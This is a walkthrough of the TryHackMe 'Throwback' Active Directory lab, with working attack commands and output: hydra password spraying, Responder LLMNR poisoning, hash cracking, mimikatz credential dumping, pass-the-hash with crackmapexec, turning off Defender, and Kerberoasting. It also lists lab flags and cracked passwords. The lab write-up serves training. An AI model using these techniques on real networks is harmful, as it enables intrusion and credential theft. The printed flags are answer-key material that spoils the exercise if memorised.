Throwback - [THM]

Cover Image for Throwback - [THM]
Marmeus
Marmeus

Table of Contents

    Introduction

    In this post I show the commands, links or files you need to use in order to gather the information required to answer all the questions in the Throwback lab.

    Note: The flags change dynamically so do not bother copying and pasting my flags.

    Throwback Network

    Task 7 - Entering the Breach

    kali@kali:~/Documents/THM/Throwback$ nmap -sV -sC -p- -v --min-rate 1000 -oN NetworkScan.txt 10.200.179.0/24  
    Nmap scan report for 10.200.179.138
    Host is up (0.046s latency).
    Not shown: 65531 filtered ports
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.5 (protocol 2.0)
    | ssh-hostkey:
    |_  4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)
    53/tcp  open  domain   (generic dns response: REFUSED)
    80/tcp  open  http     nginx
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Did not follow redirect to https://10.200.179.138/
    443/tcp open  ssl/http nginx
    | http-methods:
    |_  Supported Methods: GET HEAD POST
    |_http-title: pfSense - Login
    | ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
    | Subject Alternative Name: DNS:pfSense-5f099cf870c18
    | Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-07-11T11:05:28
    | Not valid after:  2021-08-13T11:05:28
    | MD5:   fe06 fa47 4d83 8454 e67a 1840 7ea8 d101
    |_SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.91%I=7%D=12/29%Time=61CC761E%P=x86_64-pc-linux-gnu%r(DNS
    SF:VersionBindReqTCP,E,"\0\x0c\0\x06\x81\x05\0\0\0\0\0\0\0\0");
    
    Nmap scan report for 10.200.179.219
    Host is up (0.046s latency).
    Not shown: 65524 filtered ports
    PORT      STATE SERVICE       VERSION
    22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    | ssh-hostkey:
    |   2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)
    |   256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)
    |_  256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods:
    |   Supported Methods: OPTIONS TRACE GET HEAD POST
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Throwback Hacks
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds?
    3389/tcp  open  ms-wbt-server Microsoft Terminal Services
    | rdp-ntlm-info:
    |   Target_Name: THROWBACK
    |   NetBIOS_Domain_Name: THROWBACK
    |   NetBIOS_Computer_Name: THROWBACK-PROD
    |   DNS_Domain_Name: THROWBACK.local
    |   DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local
    |   DNS_Tree_Name: THROWBACK.local
    |   Product_Version: 10.0.17763
    |_  System_Time: 2021-12-29T14:53:02+00:00
    | ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local
    | Issuer: commonName=THROWBACK-PROD.THROWBACK.local
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2021-12-27T01:03:16
    | Not valid after:  2022-06-28T01:03:16
    | MD5:   f469 5c2b e0d2 e866 9f43 e7f1 f342 453e
    |_SHA-1: 6924 2ba7 f824 740f 9998 023d 91c4 563e 4e72 5622
    |_ssl-date: 2021-12-29T14:54:30+00:00; 0s from scanner time.
    5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Service Unavailable
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49667/tcp open  msrpc         Microsoft Windows RPC
    49669/tcp open  msrpc         Microsoft Windows RPC
    49673/tcp open  msrpc         Microsoft Windows RPC
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2021-12-29T14:53:01
    |_  start_date: N/A
    
    Nmap scan report for 10.200.179.232
    Host is up (0.048s latency).
    Not shown: 65531 closed ports
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 4e:ef:ef:e7:60:94:87:99:d7:e1:ac:31:a1:04:04:36 (RSA)
    |   256 ac:cc:f1:cd:d4:03:cb:63:2c:56:80:30:66:26:ad:77 (ECDSA)
    |_  256 f4:dc:9d:b9:54:4a:e5:72:b9:40:19:f1:c5:75:ac:9b (ED25519)
    80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: 2D267521ED544C817FADA219E66C0CCC
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    | http-title: Throwback Hacks - Login
    |_Requested resource was src/login.php
    143/tcp open  imap     Dovecot imapd (Ubuntu)
    |_imap-capabilities: OK have IDLE post-login LOGIN-REFERRALS LOGINDISABLEDA0001 more capabilities ENABLE IMAP4rev1 listed ID SASL-IR LITERAL+ Pre-login STARTTLS
    | ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
    | Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-07-25T15:51:57
    | Not valid after:  2030-07-23T15:51:57
    | MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
    |_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
    |_ssl-date: TLS randomness does not represent time
    993/tcp open  ssl/imap Dovecot imapd (Ubuntu)
    |_imap-capabilities: listed IDLE have LOGIN-REFERRALS post-login more capabilities ENABLE SASL-IR AUTH=PLAINA0001 ID OK IMAP4rev1 Pre-login LITERAL+
    | ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
    | Issuer: commonName=ip-10-40-119-232.eu-west-1.compute.internal
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2020-07-25T15:51:57
    | Not valid after:  2030-07-23T15:51:57
    | MD5:   adc4 c6e2 d74f d9eb ccde 96aa 5780 bb69
    |_SHA-1: 93aa 5da0 3829 8ca3 aa6b f148 4f92 1ed0 c568 a942
    |_ssl-date: TLS randomness does not represent time
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 10.200.179.250
    Host is up (0.046s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 bb:e5:c5:44:5c:ca:12:47:80:fc:35:6a:a8:30:12:e4 (RSA)
    |   256 b5:cc:d4:cd:0e:57:56:49:95:e5:fc:fc:17:74:0c:68 (ECDSA)
    |_  256 17:c6:0a:3d:e3:98:21:63:bf:2c:a4:f5:db:c1:00:53 (ED25519)
    1337/tcp open  http    Node.js Express framework
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Error
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    • 10.200.XXX.138 -> Firewall (PFsense)
    • 10.200.XXX.219 -> Windows IIS
    • 10.200.XXX.232 -> Linux MAIL

    What is the domain name?

    THROWBACK.local

    What is the HTTP title of the web server running on THROWBACK-PROD?

    Throwback Hacks

    How many ports are open on THROWBACK-MAIL?

    4

    What service is running on THROWBACK-FW01?

    pfSense

    What version of Apache is running on THROWBACK-MAIL?

    Apache/2.4.29

    Task 8 - Exploring the Caverns

    Who is the CEO of Throwback Hacks?

    http://10.200.XXX.219/#team -> Summers Winters

    Where is the company located?

    http://10.200.XXX.219/#contact -> Great Britain

    What is the guest username on the mail server?

    http://10.200.XXX.232/src/login.php -> tbhguest

    What is the guest password on the mail server?

    http://10.200.XXX.232/src/login.php -> WelcomeTBH1!

    What flag is found within the guest inbox?

    TBH{ede543c628d365ab772078b0f6880677}

    What flag is found in the guest contacts page?

    TBH{4060a70860f0a1648e5a991de1739888}

    Task 9 - Web Shells and You!

    Source: Link

    What username was used to access the configuration portal?

    admin

    What password was used to access the configuration portal?

    pfsense

    What menu tab contains a command prompt tab in the PFSense Configuration panel?

    Diagnostics/Command Promtp

    Task - 10 First Contact

    What log file was found that is not a default log?

    cat /var/log/login.log 
    Last Login 8/9/2020 15:51 -- HumphreyW:1c13639dba96c7b53d26f7d00956a364

    What user was found within the log?

    HumphreyW

    What is the hash of the user?

    1c13639dba96c7b53d26f7d00956a364 -> securitycenter

    What is the root flag on THROWBACK-FW01?

    TBH{4060a70860f0a1648e5a991de1739888}

    cat /root/root.txt
    TBH{b6f17a9c06e75ea4a09b79e8d89f9749}

    What is the log flag on THROWBACK-FW01?

    /var/log/flag.txt
    TBH{c9cf8b688a9b8677a4546781527e4484}

    Task 11 - Wait, just you mean just one this time?

    POST /src/redirect.php HTTP/1.1
    Host: 10.200.179.232
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 89
    Origin: http://10.200.179.232
    Connection: close
    Referer: http://10.200.179.232/src/login.php
    Cookie: SQMSESSID=on1cj6suhl1ebvv8ha7pq0mm41
    Upgrade-Insecure-Requests: 1
    
    
    login_username=tbhguest&secretkey=WelcomeTBH1%21&js_autodetect_results=1&just_logged_in=1
    

    Command:

    kali@kali:~/Documents/THM/Throwback$ cat users.txt 
    tbhguest
    HumphreyW
    SummersW
    FoxxR
    noreply
    DaibaN
    PeanutbutterM
    PetersJ
    DaviesJ
    BlaireJ
    GongoH
    MurphyF
    JeffersD
    HorsemanB
    
    kali@kali:~/Documents/THM/Throwback$ cat weakPasswords.txt 
    WelcomeTBH1!
    securitycenter
    Summer2020
    Fall2020
    Winter2020
    Autumn2020
    Summer2019
    Fall2019
    Winter2019
    Autumn2019
    Summer2018
    Fall2018
    Winter2018
    Autumn2018
    Management2020
    Management2019
    Management2018
    Password2020
    Password2019
    Password2018
    TBHSecurity2020
    TBHSecurity2018
    TBHSecurity2019
    Throwback2020
    Throwback2019
    Throwback2018
    Password123
    
    kali@kali:~/Documents/THM/Throwback$ hydra -L users.txt -P weakPasswords.txt 10.200.179.232 http-post-form '/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=incorrect' 
    [80][http-post-form] host: 10.200.179.232   login: tbhguest   password: WelcomeTBH1!
    [80][http-post-form] host: 10.200.179.232   login: HumphreyW   password: securitycenter
    [STATUS] 89.00 tries/min, 89 tries in 00:01h, 191 to do in 00:03h, 16 active
    [80][http-post-form] host: 10.200.179.232   login: PeanutbutterM   password: Summer2020
    [80][http-post-form] host: 10.200.179.232   login: DaviesJ   password: Management2018
    [STATUS] 64.67 tries/min, 194 tries in 00:03h, 86 to do in 00:02h, 16 active
    [80][http-post-form] host: 10.200.179.232   login: GongoH   password: Summer2020
    [80][http-post-form] host: 10.200.179.232   login: MurphyF   password: Summer2020
    [80][http-post-form] host: 10.200.179.232   login: JeffersD   password: Summer2020

    What is the username parameter in the POST request?

    login_username

    What is the password parameter in the POST request?

    secretkey

    What username found with hydra starts with an M?

    MurphyF

    What is the password found with hydra?

    Summer2020

    Task 12 - Gone Phishing

    msf6 exploit(multi/handler) > sessions 1
    [*] Starting interaction with 1...
    
    meterpreter > getuid
    Server username: THROWBACK-WS01\BlaireJ
    
    meterpreter > sysinfo
    Computer        : THROWBACK-WS01
    OS              : Windows 10 (10.0 Build 19041).
    Architecture    : x64
    System Language : en_US
    Domain          : THROWBACK
    Logged On Users : 10
    Meterpreter     : x86/windows

    What User was compromised via Phishing?

    BlaireJ

    What Machine was compromised during Phishing?

    THROWBACK-WS01

    What is the root flag on THROWBACK-WS01?

    meterpreter > cat C:\\Users\\BlaireJ\\Desktop\\root.txt
    TBH{9c5e361a2368723e042924180be7c958}

    What is the user flag on THROWBACK-WS01?

    meterpreter > cat C:\\Users\\humphreyw\\Desktop\\user.txt
    TBH{813e2c2709ceb02041891acaec55121d}

    Task 13 - Just a Drop Will Do

    kali@kali:~/Documents/THM/Throwback$ sudo responder -I tun0 -rdw -v  
    
    [SMB] NTLMv2-SSP Client   : 10.200.179.219
    [SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
    [SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:2f71c71c129872db:C2C361B7F2729FF632B3E0174EAA9CA8:010100000000000000647150A9FCD70162AD743085ED01C400000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000
    [SMB] NTLMv2-SSP Client   : 10.200.179.219
    [SMB] NTLMv2-SSP Username : THROWBACK\PetersJ
    [SMB] NTLMv2-SSP Hash     : PetersJ::THROWBACK:d18b1b179c6b5da6:8E585648F1086DB4DD79D6B4CA92388A:010100000000000000647150A9FCD701B4D13C91B3AFE5B500000000020008004B004A004200340001001E00570049004E002D005800460046004300390045004500490059005700430004003400570049004E002D00580046004600430039004500450049005900570043002E004B004A00420034002E004C004F00430041004C00030014004B004A00420034002E004C004F00430041004C00050014004B004A00420034002E004C004F00430041004C000700080000647150A9FCD70106000400020000000800300030000000000000000000000000200000D52796F7101C20005C176D4C56B192B5A86AB2ACD74DABA441F4CF6F2F556D7A0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00350030002E003100370036002E00340035000000000000000000

    What User fell victim to LLMNR Poisoning?

    PetersJ

    What is the 4th octet of the IP Address the LLMNR request came from?

    219

    What is the hostname of the device?

    THROWBACK-PROD

    Task 14 - We Will, We Will, Rockyou

    What is the cracked password from the pfSense hash?

    kali@kali:~/Documents/THM/Throwback$ john -w=/usr/share/wordlists/rockyou.txt --format=NT pfsense_hash.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
    Warning: no OpenMP support for this hash type, consider --fork=4
    Press 'q' or Ctrl-C to abort, almost any other key for status
    securitycenter   (?)
    1g 0:00:00:00 DONE (2021-12-29 11:57) 1.351g/s 1078Kp/s 1078Kc/s 1078KC/s seesaw22..sebial
    Use the "--show --format=NT" options to display all of the cracked passwords reliably
    Session completed
    

    What is the cracked password from LLMNR poisoning?

    kali@kali:~/Documents/THM/Throwback$ hashcat -m 5600 -r /opt/OneRuleToRuleThemAll.rule  responder_hashes.txt /usr/share/wordlists/rockyou.txt 
    PETERSJ::THROWBACK:d18b1b179c6b5da6:8e585648f1086db4dd79d6b4ca92388a:010100000000000000647150a9fcd701b4d13c91b3afe5b500000000020008004b004a004200340001001e00570049004e002d005800460046004300390045004500490059005700430004003400570049004e002d00580046004600430039004500450049005900570043002e004b004a00420034002e004c004f00430041004c00030014004b004a00420034002e004c004f00430041004c00050014004b004a00420034002e004c004f00430041004c000700080000647150a9fcd70106000400020000000800300030000000000000000000000000200000d52796f7101c20005c176d4c56b192b5a86ab2acd74daba441f4cf6f2f556d7a0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00350030002e003100370036002e00340035000000000000000000:Throwback317
    

    Task 18 - SEATBELT CHECK!

    ====== CredEnum ======
      Target              : localadmin.pass
      UserName            : admin-petersj
      Password            : 
      CredentialType      : DomainPassword
      PersistenceType     : Enterprise
      LastWriteTime       : 8/25/2020 2:52:57 AM

    What user was found from seatbelt?

    admin-petersj

    Submit flag for THROWBACK-PROD in Task 4

    Executing the following command through an RDP session we can obtain all the flags in the machine.

    C:\Users\petersj\Documents>runas /savecred /user:admin-petersj /profile "cmd.exe"

    What is the flag from the poisoned user on THROWBACK-PROD?

    C:\User>type C:\\Users\\petersj\\Desktop\\user.txt
    TBH{277c5929d176569338ce0cff02f328c0}

    What is the second user flag on THROWBACK-PROD?

    C:\User>type C:\\Users\\blaitej.THROWBACK\\Desktop\\user.txt
    TBH{9b56df4dc5cbda864a246ebfe4964d6c}

    What is the root flag on THROWBACK-PROD?

    PS C:\Users> type C:\Users\Administrator\Desktop\root.txt
    TBH{4d6945c0b80283b875fc7c3a5a057da6}

    Task 20 - Not the soft and fluffy kind

    runas /savecred /user:admin-petersj /profile "C:\\Users\\petersj\\Documents\\launcher.bat"
    
    powershell/credentials/mimikatz/command
    privilege::debug sekurlsa::logonpasswords
    Authentication Id : 0 ; 182634 (00000000:0002c96a)
    Session           : Batch from 0
    User Name         : BlaireJ
    Domain            : THROWBACK
    Logon Server      : THROWBACK-DC01
    Logon Time        : 12/29/2021 8:50:13 PM
    SID               : S-1-5-21-3906589501-690843102-3982269896-1116
    	msv :	
    	 [00000003] Primary
    	 * Username : BlaireJ
    	 * Domain   : THROWBACK
    	 * NTLM     : c374ecb7c2ccac1df3a82bce4f80bb5b
    	 * SHA1     : 6522277853426f24275c4c0b0381458ef452e640
    	 * DPAPI    : db241bce607cacb4b04d032e25071f0f
    	tspkg :	
    	wdigest :	
    	 * Username : BlaireJ
    	 * Domain   : THROWBACK
    	 * Password : (null)
    	kerberos :	
    	 * Username : BlaireJ
    	 * Domain   : THROWBACK.LOCAL
    	 * Password : 7eQgx6YzxgG3vC45t5k9
    	ssp :	
    	credman :	
    	
    Authentication Id : 0 ; 77225 (00000000:00012da9)
    Session           : Batch from 0
    User Name         : Administrator
    Domain            : THROWBACK-PROD
    Logon Server      : THROWBACK-PROD
    Logon Time        : 12/29/2021 8:50:00 PM
    SID               : S-1-5-21-1142397155-17714838-1651365392-500
    	msv :	
    	 [00000003] Primary
    	 * Username : Administrator
    	 * Domain   : THROWBACK-PROD
    	 * NTLM     : a06e58d15a2585235d18598788b8147a
    	 * SHA1     : 4e40938facb10fb6aa244240301b791a0454f328
    	tspkg :	
    	wdigest :	
    	 * Username : Administrator
    	 * Domain   : THROWBACK-PROD
    	 * Password : (null)
    	kerberos :	
    	 * Username : Administrator
    	 * Domain   : THROWBACK-PROD
    	 * Password : (null)	

    What domain user was logged in?

    BlaireJ

    What is the user's hash?

    c374ecb7c2ccac1df3a82bce4f80bb5b

    What is the administrator's NTLM hash?

    a06e58d15a2585235d18598788b8147a

    Task 22 - Good Intentions, Courtesy of Microsoft

    ┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
    └─# proxychains crackmapexec smb 10.200.179.0/24 -u BlaireJ -d THROWBACK -H c374ecb7c2ccac1df3a82bce4f80bb5b 2>1 | grep \+
    SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:445 <--socket error or timeout!
     ...  OK                                                                                                                                                      
    SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
    SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b 
    SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b (Pwn3d!)
    SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\BlaireJ c374ecb7c2ccac1df3a82bce4f80bb5b   
    
    kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ proxychains crackmapexec smb 10.200.179.0/24 -u HumphreyW -d THROWBACK -H 1c13639dba96c7b53d26f7d00956a364  2>1 | grep \+
    SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
    SMB         10.200.179.176  445    THROWBACK-TIME   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
    SMB         10.200.179.222  445    THROWBACK-WS01   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364 
    SMB         10.200.179.219  445    THROWBACK-PROD   [+] THROWBACK\HumphreyW 1c13639dba96c7b53d26f7d00956a364

    Task 23 - Wallace and Gromit

    We need to disable the windows firewall in order to upload SharpHound.ps1 and we can do it because we are member of the Administrators group.

    kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains ssh "blairej"@10.200.179.222
    throwback/blairej@10.200.179.222's password: 7eQgx6YzxgG3vC45t5k9
    
    blairej@THROWBACK-WS01 C:\Users\BlaireJ> net user BlaireJ  
    [...]                  
    Local Group Memberships      *Administrators         
    Global Group memberships     *None 
    blairej@THROWBACK-WS01 C:\Users\BlaireJ>powershell -c "Set-MpPreference -DisableRealTimeMonitoring $true"
    
    blairej@THROWBACK-WS01 C:\Users\BlaireJ>
    PS C:\Users\BlaireJ> Invoke-Bloodhound -CollectionMethod All -Domain Throwback -ZipFileName loot.zip                 
    ------------------------------------------------
    Initializing SharpHound at 3:26 PM on 12/29/2021
    ------------------------------------------------
    
    Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
    
    [+] Cache File not Found: 0 Objects in cache
    
    [+] Pre-populating Domain Controller SIDS
    Status: 0 objects finished (+0) -- Using 84 MB RAM
    Status: 151 objects finished (+151 15.1)/s -- Using 97 MB RAM
    Enumeration finished in 00:00:10.5925838
    Compressing data to C:\Users\BlaireJ\20211229152617_loot.zip
    You can upload this file directly to the UI
    
    SharpHound Enumeration Completed at 3:28 PM on 12/29/2021! Happy Graphing!
    
    PS C:\Users\BlaireJ> dir
    
    
        Directory: C:\Users\BlaireJ
    
    
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d-r---         6/28/2020   3:31 PM                3D Objects
    d-r---         6/28/2020   3:31 PM                Contacts
    d-r---         8/25/2020   3:43 PM                Desktop
    d-r---         6/28/2020   3:31 PM                Documents
    d-r---         7/27/2020   8:39 AM                Downloads
    d-r---         6/28/2020   3:31 PM                Favorites
    d-r---         6/28/2020   3:31 PM                Links
    d-r---         6/28/2020   3:31 PM                Music
    d-r---          8/9/2020  10:25 AM                OneDrive
    d-r---         6/28/2020   3:33 PM                Pictures
    d-r---         6/28/2020   3:31 PM                Saved Games
    d-r---         6/28/2020   3:33 PM                Searches
    d-r---         7/14/2020  11:47 AM                Videos
    -a----        12/29/2021   3:28 PM          15330 20211229152617_loot.zip
    
    kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains scp "blairej"@10.200.179.222:20211229152617_loot.zip .
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:22  ...  OK
    blairej@10.200.179.222's password: 
    20211229152617_loot.zip 
    

    What service account is kerberoastable?

    On bloodhound use "List all Kerberoastable Accounts".

    SQLSERVICE

    What domain does the trust connect to?

    On bloodhound use "Map Domain Trusts".

    corporate.local

    What normal user account is a domain admin?

    On bloodhound use "Find all Domain Admins".

    Mercerh

    Task 24 - With three heads you'd think they'd at least agree once

    ┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
    └─# proxychains GetUserSPNs.py -dc-ip 10.200.179.117 "THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9" -request
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:389  ...  OK
    ServicePrincipalName                         Name        MemberOf  PasswordLastSet             LastLogon                   Delegation 
    -------------------------------------------  ----------  --------  --------------------------  --------------------------  ----------
    TB-ADMIN-DC/SQLService.THROWBACK.local:6792  SQLService            2020-07-27 11:20:08.552650  2020-07-27 11:26:43.628665             
    
    
    
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
    $krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$ebd1055f628adf4dda15bbc00ae27ea7$9be036853c410815f6847010c2532647b54ccf068a373126d000ace628541636d5a43b68bf01330ec62c347e4388479f48f3fcbf1de179c919b5ebbac164a73c2fecb65ae1b3c66cd26326c2ccb18732523818303a0b43f6cd5c8fe8ea28c4db189839c53ac14c3165d7eaecff7f02944f7d8989b148ad8b0934347ca0bbd41235c37af189f8c4502743da94afce6f33f02c5720208e76fd0222102bb8f65aef404612a820f8ffbe8fe47467402d0b6094a1e9c1f445ff98f5a78d23f875cc387cbce7ea8a35faf41dcb53e5621d87d383e414a5b2b47174513ebed714a4d8471f4b9fc178b3e01eadef97458b41f027535f781b255fb4bab8e620678c7b77f4d9161419291d1d5134be3a5ef770cf127abf1b8bed616befe780db125f87bec6f939ab6b1c4e9a7eb993411298963931a8d07367470636210789c03380d6468db8192851e93467180a000546008a718451cc62054fd063433984ffb69d09c29ec98e39de51fd726cb95f7bf180d8d0e75b4d0e65870e77ad4786f036a15f244f8905aff18d49f55985801433b901360485d56f2d5f2acc4376f83ae7baf7f64386bd065cd4636206749e031fd77a15915bf81840e98953be1ebb414372d8c4d11458d517800aba73df7cd022de595cf64c5f70b5726666ad40eb33e18918dd9f81ad95ac42dd1d45be8fe266a70474d102acf58c612b0e10843bd29a6bea67e0d6efb18334213fa99f46420f0fcd928d94698656a856c533ee6a9e1cd5cf04acab381e75f91697d0c5239400054de59beda2aaf34fee5b286b037acf5a21bc824a66ee99015bfb4509308f6c2f4d517858eb29061828ddcaaa1221c6f533f65a28e19ad2c101812b0c9a2e4b36ea2646eb181ba623f2246ec5d567f6f7f91819976926817590e250d6b8c18af594d5037c348be7328e0f6dc6c36e68eb7f0251ef54d2205eb2132ab492478e73fa23a3cae958bbed76df88aa4fa108a8293d1037b68946d7d8a8df995c06a469496d00285d13239eed17692bef3d327a314ae4e766fe159576bbb6cbdf60ea7936d138d6b0bcce23755aa12b2f447bf32ee5397619a89e259d3e303045567c223f6657f9ddc6362b562dad8f0e671d24e24b1bd172cc3d6fc0fcad622f43835ecb9a3a315a65361a32addeaef5984c864b3280fc2687255c787b96d8cea66b844fb9240d04bdb5e0724d8c88e0e690f1fc3f6e69c3cd44d28f96e45da2d750da80e1e90779f8bdcc47a6d27b8df0fa20c1c7227fc1f5afc988ace86d537d1940162743b7367a3eb273be1ab148123090fe2fc475a6234487cedd9dbdafe9cbdf4894c1c5aae24449e42d8c6cb860fe686fedd34087fa3d9b4ab5075e3ab2c74211ab

    Cracking the hash.

    kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 -a 0 sqlservice_ticket.txt /usr/share/wordlists/rockyou.txt 
    [...]:mysql337570

    What account was compromised by kerberoasting?

    SQLService

    What password was cracked from the retrieved ticket?

    mysql337570

    Task 25 - You're Five Minutes Late...

    echo "10.200.179.176 timekeep.throwback.local" | sudo tee -a /etc/hosts

    What is the hostname of the device?

    THROWBACK-TIME

    What is the title of the web page?

    Throwback Hacks Timekeep

    What user was the password reset for?

    murphyf

    What is the password reset flag on THROWBACK-TIME?

    kali@kali:~/Documents/THM/Throwback$ sudo proxychains curl "http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=PASSWORD"
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.176:80  ...  OK
    Password successfully updated TBH{326e71e82d2cfc439ee513340b8d9222}

    Task 26 - Word to your Mother

    What web server accepts XLSMs as a file upload?

    THROWBACK-TIME

    what page is the file upload in?

    timesheet.php

    What is the name of the XLSMs that you can upload?

    Timesheet.xlsm

    Task 27 - Meterpreter session 1 closed. Reason: World-Domination

